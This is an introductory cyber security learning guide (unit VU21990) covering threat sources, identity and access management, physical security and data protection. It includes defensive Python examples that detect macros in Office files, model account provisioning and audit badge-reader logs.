Learning Guide VU21990 Recognise The Need For Cyber Security in An Organisation v9.1

Security basics

VU21990 Recognise the need for cyber security in an organisation


Learning guide 1 of 2

This unit provides introductory knowledge and skills to recognise threats, risks and vulnerabilities to
cyber security in an organisation. It covers the threat sources in an organisation, such as networks,
machines, applications, data, users and infrastructure; an introduction to common cyber security attack
mechanisms; an introduction to identity and access management; and the security issues surrounding
Internet of Things (IoT) devices. Finally, the unit introduces the tools and systems an organisation can
implement to protect itself from cyber-attacks.
Contents

VU21990 Recognise the need for cyber security in an organisation (p. 1)
INFORMATION SECURITY (p. 5)
THREAT SOURCES (p. 5)
    Network (p. 5)
    Data (p. 5)
    Applications (p. 6)
    Users (p. 7)
    Machines (p. 7)
    Other threat sources (p. 7)
DATA, NETWORKS, MACHINES, USERS AND APPLICATIONS (p. 7)
IDENTITY AND ACCESS MANAGEMENT (p. 7)
    Active Directory (AD) (p. 9)
SECURING THE PHYSICAL INFRASTRUCTURE (p. 9)
REASONS TO PROTECT ONLINE IDENTITY AND PERSONAL DATA (p. 11)
    Reputation (p. 12)
    Financial (p. 12)
    Other reasons to protect your online identity and data (p. 13)
    How are identities stolen (p. 13)
PROTECTING PERSONAL PRIVACY (p. 13)
REASONS TO PROTECT AN ORGANISATION’S DATA (p. 14)
    Legal (p. 14)
    Reputational (p. 14)
    Financial (p. 15)
    Operational (p. 15)
WHAT IS A CYBER THREAT? (p. 15)
WHY DO WE NEED CYBER SECURITY PROFESSIONALS? (p. 16)
SECURITY VULNERABILITIES AND MALWARE (p. 17)
    Malware (p. 17)
    Vulnerability (p. 17)
    Common Weakness Enumeration (CWE) (p. 18)
SOURCES OF MALWARE (p. 18)
THREAT ACTORS, THREAT VECTORS AND THREAT GOALS (p. 22)
TECHNIQUES TO INFILTRATE A SYSTEM (p. 23)
    Keylogging (p. 23)
    Cookie stealer (p. 24)
    Bait and switch (p. 24)

Page 2 Security Basics Learning guide 1 of 2 VU21990 Recognise the need for cyber V9.1
512277200.docx
    Eavesdropping (p. 24)
    Phishing (p. 24)
    Clickjacking (p. 24)
    Fuzzing (p. 24)
    Advanced Persistent Threat (APT) (p. 25)
    Back door (p. 25)
CHARACTERISTICS OF A CYBER-ATTACK (p. 27)
ACTORS (p. 27)
    Motivation (p. 27)
    Target (p. 28)
    Attack surface (p. 28)
    Effect on target (p. 28)
    Duration (p. 28)
    Attack vector (p. 29)
    Vulnerability (p. 29)
    Malicious software (p. 29)
OPERATION OF A CYBER ATTACK (p. 30)
    Target attack (p. 30)
CYBER THREAT TRENDS (p. 31)
    Phishing (p. 31)
    Remote access and IoT (p. 32)
    Smartphones (p. 32)
    Artificial intelligence (p. 32)
CYBER-ATTACKS ON ENTERPRISE INFRASTRUCTURE (p. 32)
    Examples of enterprise infrastructure attacks (p. 32)
INTERNET OF THINGS DEVICES (p. 33)
    IoT device examples (p. 33)
IOT SECURITY VULNERABILITIES (p. 34)
PROTECTING PERSONAL DEVICES AND DATA (p. 35)
    Encryption (p. 35)
    Hashing (p. 35)
    Trusted Platform Module (TPM) (p. 36)
    Passwords (p. 36)
    Python Script for Password Cracking (p. 38)
    Multi-factor authentication (p. 41)
    Backup (p. 41)
    Anti-malware and Anti-virus (p. 41)
OPERATING SYSTEM AND APPLICATION UPDATES (p. 42)
    Configure browser to block Flash, ads and Java (p. 43)
AUTHENTICATION TECHNIQUES (p. 45)
    AAA (p. 46)
    Active Directory Users and Computers (p. 46)
LOGICAL AND PHYSICAL METHODS OF GAINING ACCESS TO COMPUTING ELEMENTS (p. 46)
    Biometric devices (p. 46)
    Permissions (p. 47)
EQUIPMENT USED TO PROTECT AN ORGANISATION FROM CYBER SECURITY ATTACKS (p. 48)
    Firewall (p. 48)
    Intrusion Detection System (IDS) (p. 49)
    Intrusion Prevention System (IPS) (p. 49)
    IPS, IDS & Firewall differences (p. 50)
    Unified Threat Management System (UTM) (p. 50)
    Router (p. 50)
    Switch (p. 50)
    Cyber kill chain (p. 51)
BOTNET (p. 51)
    Behaviour based security (or heuristics) (p. 51)
METHODS FOR PROTECTING AN ORGANISATION FROM CYBER-ATTACK (p. 52)
    Cyber security standards bodies (p. 53)
    Enterprise Security frameworks (p. 53)
BEHAVIOUR BASED APPROACH TO CYBER SECURITY (BEHAVIOURAL ANALYTICS) (p. 54)
INCIDENT RESPONSE STANDARDS (p. 55)
    Revisions (p. 56)

Information Security
“Information Security is the practice of preventing unauthorized access, use, disclosure,
disruption, modification, inspection, recording or destruction of information.” (GeeksforGeeks)
https://www.geeksforgeeks.org/what-is-information-security/ (accessed 29 May 2020)

Information security helps maintain the confidentiality, integrity and availability (CIA) of data:

- Confidentiality means information is disclosed only to authorised users.
- Integrity means information is not changed without permission, and unauthorised changes can be detected.
- Availability means information, and the systems that hold it, are accessible to authorised users
  whenever they are needed.

1.2 Threat sources for an organisation are identified

Threat sources
A threat source, sometimes referred to as a threat agent, is “The intent and method targeted at the
intentional exploitation of a vulnerability, or a situation and method that may accidentally trigger a
vulnerability” [1].

This definition shows that a threat source may be intentional or accidental. For example, an
intentional threat could be someone breaking into a computer system, and an accidental threat
could be someone forgetting to lock their computer.

A threat source is the cause of a threat, such as a hostile cyber or physical attack, a human error of
omission or commission, a failure of organization-controlled hardware or software, or other failure
beyond the control of the organization. A threat event is an event or situation initiated or enabled by
a threat source that has the potential for causing adverse impact.

A threat source is at the root of adverse effects:

    Threat source --initiates--> Threat event --exploits--> Vulnerability --causing--> Adverse impact

Figure 1 - Chain of events causing adverse impacts

Sources of threats can be categorised in various ways. For example, network, data, applications,
users, machines, and natural events.

Network
Network threat sources include hardware such as routers, switches, workstations, and servers, as
well as software such as server operating systems.

Data
Data threat sources include confidential information that when revealed, exposes an organisation to
financial, reputational, or operational loss.
[1] https://csrc.nist.gov/glossary/term/threat_source (accessed 29 May 2020)

Applications
Applications include everyday desktop applications such as MS Word and Adobe PDF Reader. Applications
such as these have vulnerabilities that can be exploited. For example, MS Word can automate tasks by
recording the individual actions that make up a task: bolding some text, changing the font type and
then the font size can all be recorded in a single macro that is subsequently replayed by clicking a
single button.

Figure 2 - Macro recording in MS Word

However, aside from this harmless kind of macro, the Visual Basic for Applications (VBA) language used
to write useful macros can also run shell commands and launch programs. A macro can therefore delete
files and drive other applications, such as an email client, with the privileges of the user who
opened the document.

Application threat source example


An example of a malicious macro is the Melissa virus (1999). When executed, the macro emailed a copy
of the infected document to the first 50 entries in the user's email address book; when each recipient
opened the document, another 50 people received it.

Office macros are better controlled now: they are no longer run automatically when a document is
opened. Instead the user is warned that the document contains macros and must choose whether to
enable them, so the attack now depends on persuading the user to click through that warning.
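The VBA risk described above is easiest to manage at the boundary, before a document reaches a user. The following Python script is an added example (not part of this learning guide and not any vendor's code) that checks whether an Office Open XML document carries a VBA macro project by inspecting the zip container it actually is, rather than trusting the file extension: a macro-enabled Word file declares the part word/vbaProject.bin and a macroEnabled main document type in [Content_Types].xml. The sample packages it builds are constructed in memory for the demonstration; the vbaProject.bin payload is a placeholder, not a real compiled VBA project (a real one is an OLE compound file holding compressed VBA source, which a tool such as oletools' olevba decodes to show what the macro does).

```python
import io
import zipfile
import xml.etree.ElementTree as ET

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
CT_XML = "[Content_Types].xml"


def build_sample_package(with_macro: bool) -> bytes:
    """Construct a minimal OOXML zip in memory (test data, not a real Word file).

    The content types mirror what Word writes: a macro-enabled document declares
    a 'bin' default of the VBA project type and a macroEnabled main document part.
    """
    if with_macro:
        main_type = "application/vnd.ms-word.document.macroEnabled.main+xml"
    else:
        main_type = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
    defaults = '<Default Extension="xml" ContentType="application/xml"/>'
    if with_macro:
        defaults += f'<Default Extension="bin" ContentType="{VBA_CONTENT_TYPE}"/>'
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'{defaults}<Override PartName="/word/document.xml" ContentType="{main_type}"/>'
        '</Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(CT_XML, content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Placeholder standing in for a compiled VBA project (assumption: a real
            # vbaProject.bin is an OLE compound file holding compressed VBA source).
            zf.writestr("word/vbaProject.bin", b"PLACEHOLDER VBA PROJECT")
    return buf.getvalue()


def inspect_package(data: bytes) -> dict:
    """Return the macro indicators found in an OOXML package, whatever its file name."""
    findings = {"is_ooxml": False, "has_vba_part": False,
                "declares_vba_type": False, "macro_enabled_main": False}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return findings   # legacy binary .doc (OLE) or not an Office file at all
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if CT_XML not in names:
            return findings   # a zip, but not an OOXML package
        findings["is_ooxml"] = True
        # 1. The macro part itself, wherever it sits in the package tree.
        findings["has_vba_part"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        # 2. What the package declares about its parts.
        root = ET.fromstring(zf.read(CT_XML))
        for element in root:
            content_type = element.get("ContentType", "")
            if content_type == VBA_CONTENT_TYPE:
                findings["declares_vba_type"] = True
            if "macroenabled" in content_type.lower():
                findings["macro_enabled_main"] = True
    return findings


def is_macro_document(data: bytes) -> bool:
    """True if any indicator fires; a mail gateway would quarantine or strip such files."""
    found = inspect_package(data)
    return found["has_vba_part"] or found["declares_vba_type"] or found["macro_enabled_main"]


if __name__ == "__main__":
    for label, package in (("plain.docx", build_sample_package(False)),
                           ("invoice.docm", build_sample_package(True))):
        verdict = "macro project present" if is_macro_document(package) else "no macro project"
        print(f"{label}: {verdict} {inspect_package(package)}")
```

Three indicators are checked rather than one because they fail independently: a crafted package can omit the content-type declaration while still shipping the part, or carry a stale declaration with no part. Any of them is enough to route the file for manual review; none of them tells you what the macro does, which is the job of a VBA decoder and a sandbox.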

Other application threat sources


Many, if not all, applications have vulnerabilities.

Activity – visit the CVE database and review Adobe PDF vulnerabilities. An example is CVE-2019-7841
(out-of-bounds read vulnerability):
https://www.cvedetails.com/vulnerability-list/vendor_id-53/product_id-497/Adobe-Acrobat-Reader.html

Activity – watch a video explaining how data may go out of bounds (buffer overflow vulnerability):
https://www.youtube.com/watch?v=1S0aBV-Waeo (17:00)

Users
User threat sources include people internal and external to an organisation, such as hackers,
terrorists, suppliers, competitors and employees. An accidental example is an employee who
inadvertently emails a virus, leaves confidential files accessible or installs a mobile phone
application designed to collect private data. An intentional example is a hacker who attempts to
circumvent system security for financial gain or other malicious purposes.

Machines
Machine threat source examples include virus-infected PCs that carry out malicious activities, PCs
used accidentally to access confidential information, routers enlisted in a botnet DDoS attack, and
sensors such as IP cameras that record confidential information that may later be viewed with
malicious intent.

Other threat sources


The National Institute of Standards and Technology (NIST) breaks threat sources into adversarial,
accidental, structural and environmental.

Activity – visit NIST and review examples of types of threat sources (Appendix D of NIST Special
Publication 800-30r1):

https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-30r1.pdf

1.3 Relationship between data, networks, machines, users and applications in an enterprise is
defined

Data, networks, machines, users and applications


Data, networks, machines, users and applications are all related. For the most part, users are the
glue that binds the others together: a user controls a machine, which runs an application, which in
turn uses data for some purpose. Automated machines can also use applications, data and other
machines without a user present. A network of some type is required to share data between machines.

Essentially, a user enters or modifies data using an application on a machine. The data can
subsequently be transmitted over a network for storage, or for use by another application, machine
or user. This is why a weakness in any one element exposes the others: a stolen user credential
gives an attacker the machine, the machine gives the applications, and the applications give the data.

1.4 Introduction to identity and access management (IAM) is clarified

Identity and Access Management
Identity and access management (IAM), sometimes called simply ‘identity management’, is the
combination of business processes, policies and technologies that together facilitate the central
management of digital identities and of what each identity is allowed to access.

In years past when applications, services and users were less in number than today, management of
their identities and access was handled manually. However, today a typical user requires access to
perhaps hundreds of applications and services to carry out their job function. Also, these
applications and services might span multiple organisations and technologies including mobile, on-
premises and cloud. Also, an organisation may have hundreds or thousands of users. An IAM system
enables secure and central management of this.

IAM brings all the resources an identity needs together under a single digital identity that can be
accessed with a single login. Within an enterprise this is referred to as single sign-on (SSO). Across
multiple enterprises, where one organisation trusts another's authentication of a user, it is referred
to as federated identity (federated sign-on).

The benefits of IAM include the following:

- Improved operational efficiency: when roles have been set up in advance, a user who changes role
  is simply moved into the existing role rather than having permissions modified one by one
- Better compliance with confidentiality and privacy obligations, by managing how data is accessed
- Reduced cost, by ensuring that only the identities that need a resource (bandwidth, storage,
  licences) have access to it
- Increased confidentiality and integrity, by restricting access to sensitive information to the
  identities that require it

It is common for the Active Directory service provided in Windows Server to be described as an IAM
system. However, Active Directory is more correctly termed an IAM technology: it is a central
repository of user information used to authenticate logins and authorise access to resources. In
comparison, an IAM system automates the process of populating and managing Active Directory, or
another directory service, from authoritative sources such as an HR system (joiners, movers and
leavers). A complete IAM system includes the human policies and procedures used to implement the
IAM technology.

Activity – Review information about IAM systems and technology to better understand the difference

https://stackoverflow.com/questions/43987531/difference-between-active-directory-and-identity-and-access-management

https://www.esecurityplanet.com/products/top-iam-products.html
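The distinction between the directory (the IAM technology) and the processes around it (the IAM system), and the role-change benefit listed above, can be shown in code. The following Python model is an added example (not from the learning guide and not how any particular product is implemented): a minimal stand-in for a directory service that only knows accounts and groups, driven by a provisioning layer that owns the authoritative user-to-role record and handles joiner, mover and leaver events. The role and group names are hypothetical. The point to notice is the mover: a role change removes the old role's groups as well as adding the new ones, and a reconciliation pass reports groups that were added by hand at the console and are not part of any role (entitlement drift).

```python
from __future__ import annotations
from dataclasses import dataclass, field

# Role model (hypothetical names): the directory groups each role is entitled to.
ROLE_GROUPS = {
    "helpdesk": {"Domain Users", "Helpdesk", "Password-Reset"},
    "finance":  {"Domain Users", "Finance", "Payroll-Read"},
    "sysadmin": {"Domain Users", "Server-Admins", "Backup-Operators"},
}


@dataclass
class Account:
    name: str
    enabled: bool = True
    groups: set = field(default_factory=set)


class Directory:
    """Stand-in for the directory service (the IAM technology). It stores accounts
    and group membership and knows nothing about roles or HR events."""

    def __init__(self) -> None:
        self.accounts: dict[str, Account] = {}

    def create(self, name: str) -> Account:
        self.accounts[name] = Account(name)
        return self.accounts[name]

    def add_to_group(self, name: str, group: str) -> None:
        self.accounts[name].groups.add(group)

    def remove_from_group(self, name: str, group: str) -> None:
        self.accounts[name].groups.discard(group)

    def disable(self, name: str) -> None:
        self.accounts[name].enabled = False


class Provisioner:
    """The IAM system layer: owns the authoritative user-to-role record and drives
    the directory through joiner, mover and leaver events."""

    def __init__(self, directory: Directory, role_groups: dict) -> None:
        self.directory = directory
        self.role_groups = role_groups
        self.roles: dict[str, str] = {}

    def joiner(self, name: str, role: str) -> set:
        self.directory.create(name)
        self.roles[name] = role
        return self._apply_role(name)

    def mover(self, name: str, new_role: str) -> set:
        """Role change: the old role's groups are removed, not just the new ones added."""
        self.roles[name] = new_role
        return self._apply_role(name)

    def leaver(self, name: str) -> None:
        """Strip every entitlement and disable the account (kept for audit, not deleted)."""
        for group in set(self.directory.accounts[name].groups):
            self.directory.remove_from_group(name, group)
        self.directory.disable(name)
        self.roles.pop(name, None)

    def _apply_role(self, name: str) -> set:
        wanted = self.role_groups[self.roles[name]]
        current = self.directory.accounts[name].groups
        for group in current - wanted:      # excess membership, including hand-added groups
            self.directory.remove_from_group(name, group)
        for group in wanted - current:      # entitlements the role grants but the account lacks
            self.directory.add_to_group(name, group)
        return set(self.directory.accounts[name].groups)

    def reconcile(self) -> dict:
        """Entitlement drift: enabled accounts holding groups their role does not grant,
        or enabled accounts with no role at all (for example, created by hand)."""
        drift = {}
        for name, account in self.directory.accounts.items():
            if not account.enabled:
                continue
            allowed = self.role_groups.get(self.roles.get(name), set())
            excess = account.groups - allowed
            if excess or name not in self.roles:
                drift[name] = excess
        return drift


if __name__ == "__main__":
    ad = Directory()
    iam = Provisioner(ad, ROLE_GROUPS)
    iam.joiner("alice", "helpdesk")
    ad.add_to_group("alice", "Server-Admins")           # change made directly at the console
    print("drift after console change:", iam.reconcile())
    print("groups after move to finance:", iam.mover("alice", "finance"))
    iam.leaver("alice")
    print("after leaver:", ad.accounts["alice"])
```

In a real deployment the Directory class would be replaced by LDAP or PowerShell calls against the domain controller, and the role record would come from the HR system; the reconcile step is the one most often missing, and it is the reason former helpdesk staff end up holding password-reset rights years after moving on.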

Some IAM technologies available today include Microsoft Azure Active Directory and products from
Oracle, IBM and RSA.

Activity – define IAM in two sentences.

Some further examples to help define IAM are given below:

https://searchsecurity.techtarget.com/definition/identity-access-management-IAM-system

https://hitachi-id.com/resource/iam-concepts/

Active Directory (AD)


AD is a service found within Windows Server operating systems such as Windows Server 2016. AD is a
directory, or data store, that contains information about network objects such as user accounts,
computer accounts, servers and printers. Active Directory is installed when the Active Directory
Domain Services (AD DS) role is added to Windows Server and the server is promoted to a domain
controller.

Activity – View the following video: https://www.youtube.com/watch?v=OTpbQkW3kj4

1. Define the following terms – you may do additional online research to clarify your
answers:
a. Active Directory
b. Domain
c. Domain Controller
2. What is the difference between active directory and domain controllers?

Installing Active Directory

The Active Directory Domain Services role, which makes a server a domain controller, is available
only on the Server editions of Windows. Windows 10 can manage an existing domain through the Remote
Server Administration Tools (RSAT), which provide consoles such as Active Directory Users and
Computers, but it cannot host a domain itself. For this unit we will be installing Active Directory
on Windows Server to create a new domain.

Activity – view the video: https://www.youtube.com/watch?v=dXdQwDA4II0 (16:00)

Download a copy of Windows Server 2016 and install it in VirtualBox.
Install Active Directory on your new VM and make it a domain controller for mydomain.local.
Hint: You may wish to refer to the tutorial at http://pc-addicts.com/setup-active-directory-server-2016/
while stepping through the installation and configuration of Active Directory on your Windows Server VM.

1.5 Security of physical infrastructure of the enterprise is identified and evaluated

Securing the physical infrastructure


It is important to secure the physical IT infrastructure. All the firewalls, login credential strength and
logical access permissions in the world are not going to be of any use if a person can simply walk in
and take, destroy, reconfigure or otherwise interfere with, physical infrastructure such as PCs,
servers, switches, routers and backup media.

Securing the physical infrastructure involves the following:

- Securing the premises
- Securing the equipment
- Secure behaviour

Securing the premises:
- Isolate secure areas from non-secure areas to minimise human traffic
- Include protection from fire, flood and other natural disasters
- Keep confidential areas unmarked where appropriate
- Physical security controls such as door/gate key locks, swipe access and biometric devices
- Alarm functions such as motion detection, cameras and sirens, including network monitoring to
  determine if devices are in use
- Barriers including fencing and mantraps to prevent tailgating
- Vetted security guards and vetted employees
- Site design and layout
- Identity badges

Securing equipment:
- Disable access ports such as USB
- Encrypt where possible, including BYOD
- Secure disposal of equipment, such as physically destroying disk drives
- Biometric access on computing devices
- UPS and/or generators to deal with electricity outages
- Adequate HVAC control to prevent high humidity and excess heat

Secure behaviour:
- Training for users, e.g. locking devices when not in use
- Policies such as no external drives and no rogue WiFi devices
- Access protocols or policies stating when entry is allowed
- Dedicated physical security department or individual
- Defense in depth policy*
- Implement access logs on devices and also at site
- Ongoing auditing of access logs and security policies
- Threat profiles*

* Defense in depth is a method of securing assets through multiple layers of security; for example, a
computer with a biometric access system, in a locked room, in a locked building, behind a secured
fence, with a security guard. Deterrence, denial, detection then delay is a four-layer defense in
depth model: a fence is a deterrent, a locked room implements denial, an alarm system offers detection
and a cable lock on a computer delays theft until a response arrives.

* A threat profile documents types and levels of risk. It states targets, threats, vulnerabilities and
scenarios. A threat profile can be assessed to determine priorities, such as the most vulnerable
equipment or the equipment most relevant to ongoing business success.
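Access logs are only a control if someone actually reads them, and the list above includes both implementing access logs and ongoing auditing of them. The following Python script is an added example (not from the learning guide or any badge-reader vendor) of what that audit looks like when automated. It runs over a handful of constructed badge-reader log lines in an assumed format (timestamp, badge, door, direction) and applies rules against a hypothetical policy: an unissued badge, an entry outside the permitted 07:00 to 19:00 window, and anti-passback violations (a badge entering twice without leaving, or leaving without having entered), which are the usual signature of tailgating or a cloned badge.

```python
from datetime import datetime, time

# Constructed sample badge-reader log for the demonstration (not from a real system).
# Assumed format: ISO timestamp, then key=value fields for badge, door and direction.
# Lines are deliberately not in time order; real exports often are not either.
SAMPLE_LOG = """\
2020-05-29T07:58:10 badge=1042 door=server-room dir=in
2020-05-29T08:40:02 badge=1042 door=server-room dir=out
2020-05-29T12:16:03 badge=2077 door=server-room dir=in
2020-05-29T12:15:44 badge=2077 door=server-room dir=in
2020-05-29T23:12:30 badge=3310 door=server-room dir=in
2020-05-30T02:05:00 badge=3310 door=server-room dir=out
2020-05-29T09:00:00 badge=9999 door=server-room dir=in
2020-05-29T17:30:00 badge=1042 door=server-room dir=out
"""

# Hypothetical policy: badges issued for this door, and the hours entry is permitted.
ISSUED_BADGES = {1042, 2077, 3310}
ACCESS_WINDOW = (time(7, 0), time(19, 0))


def parse_line(line: str) -> dict:
    """Turn one log line into a record; the timestamp becomes a datetime, the badge an int."""
    timestamp, *fields = line.split()
    record = {"at": datetime.fromisoformat(timestamp)}
    for item in fields:
        key, value = item.split("=", 1)
        record[key] = value
    record["badge"] = int(record["badge"])
    return record


def audit(log_text: str, issued=ISSUED_BADGES, window=ACCESS_WINDOW) -> list:
    """Replay the log in time order and return policy findings.

    Rules: unknown badge; entry outside the access window; anti-passback, i.e. a
    badge entering while already inside or leaving while not inside.
    """
    records = sorted(
        (parse_line(line) for line in log_text.splitlines() if line.strip()),
        key=lambda r: r["at"],
    )
    inside = set()          # badges currently inside the secured area
    findings = []

    def flag(rule: str, rec: dict) -> None:
        findings.append({"rule": rule, "badge": rec["badge"],
                         "door": rec["door"], "at": rec["at"].isoformat()})

    for rec in records:
        if rec["badge"] not in issued:
            flag("unknown-badge", rec)
            continue                      # no state to track for a badge we never issued
        if rec["dir"] == "in":
            if not window[0] <= rec["at"].time() <= window[1]:
                flag("after-hours", rec)
            if rec["badge"] in inside:
                flag("double-entry", rec)  # someone left without badging out, or a clone
            inside.add(rec["badge"])
        elif rec["dir"] == "out":
            if rec["badge"] not in inside:
                flag("exit-without-entry", rec)  # entered by tailgating, then badged out
            inside.discard(rec["badge"])
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_LOG):
        print(f"{finding['at']}  badge {finding['badge']:<5} {finding['door']:<12} {finding['rule']}")
```

Each finding is a lead, not a verdict: a double entry is often a door held open for a colleague, which is exactly the behaviour the training and anti-tailgating items above exist to stop, and the camera footage for that timestamp is what decides it.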

Activity

Visit abc.net.au and review the Specsavers theft:

https://www.abc.net.au/news/2019-06-19/specsavers-data-breach-potential-compromise-for-clients/11223800

Visit acfe.com and review the Coca-Cola data breach case:

https://www.acfe.com/fraud-examiner.sapx?id=4294986501

Visit infosecurity-magazine.com and review the USB breach:

https://www.infosecurity-magazine.com/infosec/usb-breach-physical-security-1-1-1/

Activity – visit csoonline.com and review the bank heist via physical computer access:

https://www.csoonline.com/article/2133530/gang-exploits-both-physical-and-system-security-during-bank-robbery.html

Search the internet to find a video relative to cyber physical security. Provide a brief
overview of the video, or an interesting section of the video, after watching it (15
minutes maximum)

2.1 Reasons to protect online identity and personal data are clarified

Reasons to protect online identity and personal data

Your online identity is the sum of your characteristics and interactions online; you can look at it as
your digital footprint. It includes personal data such as your name, birthdate, home address, email
address, phone numbers, Medicare number, names of relatives, financial details and anything else
personal that you put online, including your political and religious views if you choose to post them
or submit them to a data collection service. Your online identity is also formed by your Internet
search history, YouTube searches, eBay purchases and the travel/location patterns recorded by your
phone, as well as by your interactions on social networks such as Facebook and your posts on public
forums.

Having your personal data in someone else’s hands may have good and bad consequences. Banks for
example may track your activity to better determine if your accounts are being accessed by someone
other than you. Shopping sites track your activity to better target your needs. However, it is
important to take care to protect your online identity and personal data because having it stolen can
result in reputational, financial, and other issues.

Reputation
We don’t have much control over how our personal data is shared and companies do collect and sell
personal data to others. Once the personal data is in the hands of others it is possible that intimate
details are revealed publicly resulting in embarrassment and loss of reputation. Also consider the
possibility of someone masquerading as you on social media and then you having to somehow clear
your name.

Even if you have nothing to hide at this time, your online data may be taken out of context and
misinterpreted. For example, if you were to do an Internet search relative to some radical
organisation as part of a research assignment, it may be assumed that you actually support that
radical organisation.

Financial
Your personal details can be used in identity fraud. And once your identity has been taken there is
potential to apply for government benefits, remove funds from your bank account and apply for
credit in your name. Even though you may not be held financially accountable for credit obtained in
your name, it could still be added to your credit report.

Other forms of financial fraud include taking out a loan in your name, gaining employment using your details and the sale of credit card details that go on to be used fraudulently. Credit card details are traded on the Internet and obtained via phishing, spyware, public WiFi, card skimmers and cyber security data breaches.

Activity – Learn about your digital footprint.

Visit internetsociety.org and watch a video titled ‘Four reasons to care about your digital footprint’

https://www.internetsociety.org/tutorials/your-digital-footprint-matters/

Visit abc.net.au and review stolen identity cases

https://www.abc.net.au/news/2018-09-28/couple-whose-details-were-used-to-order-phones-blame-dark-web/10311534

https://www.abc.net.au/news/2017-07-04/id-theft-like-a-bad-movie/8672400
Other reasons to protect your online identity and data
• Avoiding being robbed because of information you have posted on social networks announcing your impending absence
• Protecting your employability, because potential employers often do online background checks of social media and other areas
• Maintaining credibility for court proceedings, where online events may tarnish your status
• General privacy. Take for example the case where a young woman purchased a few online items relating to her pregnancy. The online shop in question started providing targeted pregnancy advertisements to her browser, which her unknowing father saw.
• Unknown future threats. Who knows how your private data may be used against you in 10 or 20 years’ time
• The emotional fall-out from being a victim of online data theft, which includes self-blame, feeling vulnerable, isolation and stress
• Preventing identity theft

How are identities stolen?

Identity theft occurs when someone acquires a user’s personal information, for example as follows.

• A user may be deceived into revealing personal information
• If a single user’s password can be compromised, unlocking that account may provide enough information to unlock further accounts until all accounts are compromised
• Passwords and personal information can be acquired via eavesdropping, either in person or on wireless communications
• A mass data breach may see personal information sold

Activity – Learn about browser fingerprinting.

1. Visit https://pixelprivacy.com/resources/browser-fingerprinting/ and briefly describe what browser fingerprinting is
2. Visit amiunique and view your browser fingerprint: https://amiunique.org

For students to follow up on if they want to learn about protecting their online identity:
https://www.afp.gov.au/what-we-do/crime-types/fraud/identity-crime
https://www.internetsociety.org/tutorials/manage-your-identity

4.4 Methods and tools to safeguard personal privacy are defined

Protecting personal privacy

• Log out of devices when not in use
• Only use HTTPS encrypted websites rather than HTTP sites, which transmit data in clear text
• Use two-factor authentication
• Ask for verification of identity when being asked for personal information, and contest someone’s right to ask for your personal information
• Turn off browser cookies or use tracking blocker plugins to prevent tracking
• Take care with what is shared on social media
• Use secure WiFi connections to prevent eavesdropping
• Use anti-virus and anti-malware software
• Get software from a trusted source to avoid using infected software
• Use a search engine without tracking, such as DuckDuckGo
• Change passwords regularly
• Install relevant browser plugins such as ‘Privacy Badger’, which blocks tracking

Activity – Learn about password hygiene.

Visit WindowsReport and review browser privacy plugins

https://windowsreport.com/chrome-privacy-extensions/

Visit makeuseof and review the benefits/detriments of regularly changing passwords

https://www.makeuseof.com/tag/frequent-password-changes/

Visit telesign and note the various services that offer 2FA

https://www.telesign.com/turnon2fa/tutorials/

Visit phishingquiz and test your ability to detect phishing emails

https://phishingquiz.withgoogle.com/

2.2 Reasons to protect an organisation’s data are explained

Reasons to protect an organisation’s data

Reasons for protecting a business’s online data include financial, legal, reputational, and operational ones.

Legal
Depending on the activities of an organisation there may be mandatory requirements for securing customers’ private data. If the data is leaked and it is found that adequate steps were not taken by the organisation to protect it, then the organisation may be found liable.

Reputational
Customer trust and confidence can be impacted when private data is leaked. This is not just an emotional matter for a client but can impact them financially, for example when they spend money combating subsequent identity theft. Also, if network details such as IP addresses and equipment specifics are made available, successful cyber-attacks are more likely. This could result, for example, in malicious software being installed on an organisation’s website and subsequently downloaded by customers as a virus. This would further erode customer trust and confidence.

Financial
Customer trust and confidence can be impacted when private data is leaked and they subsequently
may take their business elsewhere, which would result in financial detriment to the organisation.

If information about an organisation’s internal network is leaked, for example the IP addresses of
internal devices, then an attack is more likely than otherwise to be successful. The outcome of this
could be business downtime which indirectly affects the organisation’s finances. In addition, perhaps
a competitor has mounted a cyber-attack and extracted information to help further their
competitive advantage.

Operational
Details of an organisation’s IT infrastructure need to be kept private. If this information is leaked there is a greater potential for successful cyber-attacks such as DDoS and system access attempts, which could prevent an organisation from operating partially or completely.

2.3 Concept of cyber threat is defined

What is a cyber threat?

A cyber threat is a malicious computer-related act designed to steal data, damage reputation, reduce operational ability, spy on operations, or achieve financial gain. There are many cyber threats, including the following:

• Advanced Persistent Threats (remain resident but undetected)
• Phishing
• Trojans, worms, and viruses
• Botnets
• Ransomware
• Distributed Denial of Service (DDoS)
• Spyware/Malware
• Man-in-the-Middle (MITM)
• Drive-By Downloads
• Malvertising
• Unpatched Software
• Social engineering

Activity – Use an Internet search to briefly define each of the threats mentioned above.

Term                                                          Definition
Advanced Persistent Threats (remain resident but undetected)
Phishing
Trojans, worms, and viruses
Botnets
Ransomware
Distributed Denial of Service (DDoS)
Spyware/Malware
Man-in-the-Middle (MITM)
Drive-By Downloads
Malvertising
Unpatched Software
Social engineering

Activity – Visit scamwatch and register for scam alerts

https://www.scamwatch.gov.au/news/subscribe-to-scam-alert-emails

2.4 Reasons for the need of cyber security professionals are explained

Why do we need cyber security professionals?
There was a time when cyber security knowledge or skill was just an add-on requirement for people
working in Information Technology. However, the increase in cyber-attacks over the years has
brought with it the need for professionals specialising in that area. The large range of cyber threat
types and sheer quantity of attacks, combined with the professional approach that some cyber
criminals take today, means that dedicated professionals are required as the main defense.

As the world moves ever more toward technology, embracing Industry 4.0 and its relationship with the Industrial Internet of Things, the attack surface increases. Along with the increased attack surface, the growth of the Industrial Internet of Things brings with it the potential for serious cyber-attack consequences, as attacks on essential services such as electricity, gas and water as well as manufacturing infrastructure become more likely.

